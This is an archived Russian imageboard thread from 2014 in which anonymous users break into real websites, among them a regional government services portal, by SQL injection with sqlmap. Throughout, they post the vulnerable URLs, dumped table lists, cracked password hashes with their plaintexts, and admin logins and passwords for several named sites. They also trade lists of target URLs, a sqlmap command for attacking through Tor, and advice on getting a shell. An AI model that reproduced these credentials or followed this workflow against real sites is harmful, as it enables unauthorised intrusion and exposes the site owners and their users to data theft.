Карта сайта

Это автоматически сохраненная страница от 24.01.2014. Оригинал был здесь: http://2ch.hk/b/res/61464591.html
Сайт a2ch.ru не связан с авторами и содержимым страницы
жалоба / abuse: admin@a2ch.ru

Птн 24 Янв 2014 10:32:36
Сливаем базу в прямом эфире
Сливаем базу в прямом эфире www.mfc.ulgov.ru/index1.php?t=docs'
GET parameter 't' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n



Птн 24 Янв 2014 10:33:07
Database: mfculgo_new
[27 tables]
+---------------------------------------+
| albom |
| anketa |
| bloki |
| files |
| foto |
| gazeta |
| grafik_online |
| img |
| istiriya_online |
| kartochki_usl |
| kat |
| kniga_jalob |
| nedeli_online |
| novosty |
| novosty_tw |
| otdeleniya |
| otdeli |
| pages |
| personal |
| ruslat |
| users |
| uslugi_kat |
| uslugi_list |
| uslugi_online |
| vakansii |
| vloj_kartochki_usl |
| vopros |
+---------------------------------------+

Database: mfculgo_main
[9 tables]
+---------------------------------------+
| ifdmfc_blocks |
| ifdmfc_blocksvol |
| ifdmfc_comments |
| ifdmfc_feedback |
| ifdmfc_files |
| ifdmfc_items |
| ifdmfc_lngpacks |
| ifdmfc_usergroup |
| ifdmfc_users |
+---------------------------------------+

Птн 24 Янв 2014 10:35:29
Выкачивает users

Птн 24 Янв 2014 10:37:19
Слили
http://pastebin.com/NvTDJN90

Но пароль админа не сбрутился =(

Птн 24 Янв 2014 10:40:06
Щас может крякнет

[10:38:29] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[10:38:29] [INFO] starting 8 processes
[10:38:41] [INFO] using suffix '1'
[10:38:43] [INFO] cracked password '1258741' for hash 'e8ac3014bd52364479d9880ef
8125266f79ef3fb'
[10:38:46] [INFO] cracked password 'andry1' for hash '16300a3c4b95e936709be7449a
3e16d654244b40'
[10:38:47] [INFO] cracked password 'fred151' for hash '4fcbb537f66cf4d1828714ba0
c62fa699c5c0241'
[10:38:54] [INFO] using suffix '123'
<-
[10:39:00] [INFO] cracked password 'hjvfirf123' for hash '47f20c8cd672464fd430bd
2b75e226df0df845c1'
[10:39:05] [INFO] using suffix '2'
[10:39:17] [INFO] using suffix '12'
[10:39:25] [INFO] cracked password 'qwerty512' for hash 'ace747ea66c1c6c921ef596
183b9a7eefe9e1acc'
[10:39:29] [INFO] using suffix '3'
[10:39:33] [INFO] current status: close... \<-[0m<-[32m

Птн 24 Янв 2014 10:40:18
>>61464788
> пароль админа не сбрутился

фейл.

файлприв проверь чтоли

Птн 24 Янв 2014 10:41:15
на чем брутишь? базы небось хуёвые? сколько Гб?

Птн 24 Янв 2014 10:44:05
похоже sqlmap охуенная вещь)

Птн 24 Янв 2014 10:44:18
>>61464937
sqlmap стандартный словарь))

Птн 24 Янв 2014 10:52:07
Не брутит админку кароч. И еще у всех сцук USAGE права стоят =(

Птн 24 Янв 2014 10:52:47
>>61465071
cyber lakh

Птн 24 Янв 2014 10:53:50
Недавно ещё этот http://irinalindt.ru/art.phtml?section_id=4 ломал, там все восстановили, но дырка осталась

Птн 24 Янв 2014 10:55:46
>>61465413
Можно логиниться в крякнутые личные кабинеты и сливать персональные данные.

Птн 24 Янв 2014 10:56:20
>>61465592
Да там хуйня, а не данные.

Птн 24 Янв 2014 10:57:01
http://pastebin.com/Gtav3xQG Вот ещё вчера какую-то парашу сломал, но в админку с этими пассами не входит

Птн 24 Янв 2014 11:00:06
http://leffe-industry.imperius-rex.info/index.php?

Посоны поломайте это, с меня дохуя
roman.2ch - skype

Птн 24 Янв 2014 11:00:52
накидайте шеллов чтоли

Птн 24 Янв 2014 11:01:35
>>61465799
в sqlmap --os-shell
но права нужны же в базе, а у всех они usage

Птн 24 Янв 2014 11:07:51
Хуямп

Птн 24 Янв 2014 11:21:59
http://xn--h1acbqf.xn--e1apq.xn--p1ai/ эту парашу ща попробую еще

Птн 24 Янв 2014 11:25:00
>>61466623
Хаха.

http://xn--h1acbqf.xn--e1apq.xn--p1ai/admin/

id,pass,user1
1,6xdhd5zfds,alex



Балуйтесь, аноны.

Птн 24 Янв 2014 11:25:51
>>61466730
Бля только там что-то всё 404 нот фоунд =(

Птн 24 Янв 2014 11:33:26
Ох лол там куча сайтов в этой БД

Птн 24 Янв 2014 11:53:12
тут работает
http://cweti.com/admin/
admin
64Golubeva71Rjkmlztd14

Птн 24 Янв 2014 11:55:45
>>61467611
бумп

Птн 24 Янв 2014 11:58:02
http://cweti.com/articles.php

Птн 24 Янв 2014 12:00:11
Ну же бамп

Птн 24 Янв 2014 12:02:51

Птн 24 Янв 2014 12:05:30
http://kopiraytery.ru/admin/
+----+--------+----------------+
| id | uzer | page |
+----+--------+----------------+
| 1 | alexin | 6ed7fbcnkuiw8s |
+----+--------+----------------+

Птн 24 Янв 2014 12:09:09
http://kopiraytery.ru/ !!!1

Птн 24 Янв 2014 12:11:23
хули молчите

Птн 24 Янв 2014 12:14:35
Что за хуйня на главной не пойму?
http://kopiraytery.ru

Птн 24 Янв 2014 12:16:17
http://priut.cweti.com/new.php

Птн 24 Янв 2014 12:17:01
>>61468320
кто-то видимо зашел, лог пасс-то вон выложен)
но я надеюсь он через прокси, ибо иначе ему пизда

Птн 24 Янв 2014 12:18:05
>>61468407
Так он на себя походу ссылку выложил лол. id88094321

Птн 24 Янв 2014 12:18:53
>>61468447
скорее всего подставить его хотят

Птн 24 Янв 2014 12:18:53

Раз пошла такая пьянка, поделитесь годными советами по sqlmap.
g0tmi1k авансом.

Птн 24 Янв 2014 12:19:23
>>61468469
http://habrahabr.ru/post/153549/
вот и все советы

Птн 24 Янв 2014 12:20:07
>>61468469
а, ну и тор запускай, прежде чем иньектить.


sqlmap --tor --check-tor --tor-type=SOCKS5 --tor-port=9150 --threads 5 -u http://сайт

тор должен быть запущен чтобы работало

вот так

Птн 24 Янв 2014 12:21:44
Потестите мою парашу http://gdemoiskidki.ru/test/

Птн 24 Янв 2014 12:23:01
http://xn----7sbah6fag.xn--p1ai/admin/
id,page,admin
1,7chsw88dgwt5fxdgj,alexa

Птн 24 Янв 2014 12:23:13

>>61468483
> вот и все
Остальное - затачивание скилла? Кто как &lt;injectable_parameter> ищет?

>>61468504
Про TOR привычен - не первый год. Спасибо.

Птн 24 Янв 2014 12:24:43
>>61468584
http://happy-hack.ru/sql/
тут сканеров куча

Птн 24 Янв 2014 12:27:14
>>61468625
Еще вопрос - а если кавычки фильтруются?

Птн 24 Янв 2014 12:28:03
>>61468704
Значит сосешь хуй

Птн 24 Янв 2014 12:30:29
>>61468725
Печально, но все равно спасибо. Буду искать и учиться, хули.

Птн 24 Янв 2014 12:34:07
Из гугла первые же:
http://ditto3d.com/gallery.php?id=7
http://www.melbournefineart.com.au/gallery.php?id=18
http://www.southbayballet.org/photo-gallery.php?id=35
http://www.nubri.org/gallery.php?id=1
http://www.nickhawkexplicit.com/gallery.php?id=77
http://www.hebron.com/english/gallery.php?id=170
http://www.emmaturle.com/gallery.php?id=55

Птн 24 Янв 2014 12:36:13
>>61468549
Нуже анон, на тебя вся надежда

Птн 24 Янв 2014 12:36:34
>>61469001
Нету там иньекций

Птн 24 Янв 2014 12:39:58
>>61469014
Жаль

Птн 24 Янв 2014 12:41:26
[12:39:47] [INFO] fetching database users privileges
[12:39:49] [INFO] the SQL query used returns 1 entries
[12:39:50] [INFO] retrieved: "'ditto3d'@'10.%'","FILE"

сцук шелл не заливается с этими привелегиями

Птн 24 Янв 2014 12:44:23
Ну что, компьютерщики. Доигрались вы.

Майор Мешков

Птн 24 Янв 2014 12:45:57
>>61469288
> Майор Мешков
Майор чего?

Птн 24 Янв 2014 12:50:16

Птн 24 Янв 2014 12:50:25
http://www.nashi.su а тут

Птн 24 Янв 2014 12:51:27
>>61469500
присоединюсь вопросом, если можно.
forum.l2skazka.ru

Птн 24 Янв 2014 13:00:20
Откуда в /b столько мамкиных какиров вдруг?

У меня вопрос.
В вузике стоит система тестирования АСТ-тест. Я слил с сервера все тесты, каждый тест - переименованная access-2000-база с паролем. Пароль я сломал какой-то мокрописькой, но данные внутри шифрованы. Как мне задетектить, что за метод шифрования?

Помимо тестов есть еще база с юзерами, там данные покодированы тупо в base64, но в тестах не так..


я вообще собирался пилить свой тред, но раз тут уже есть схожий. В набигаче полтора анона, но если тут не помогут, пойду туда.

Птн 24 Янв 2014 13:01:19
Абу поломал вакабу, картинки не загружаются, скриншота нет, пиздец.
http://tau.rghost.ru/51884579/image.png

Птн 24 Янв 2014 13:02:00

Птн 24 Янв 2014 13:02:12
>>61469825
> полтора анона
ну, я тоже тут. А насчет определения шифрования можешь попробовать здесь http://crypo.in.ua/tools/

Птн 24 Янв 2014 13:08:33
>>61469896
> можешь попробовать здесь http://crypo.in.ua/tools/
Ничего похожего не нашел.

Птн 24 Янв 2014 13:28:25
>>61469531
бабамп


← К списку тредов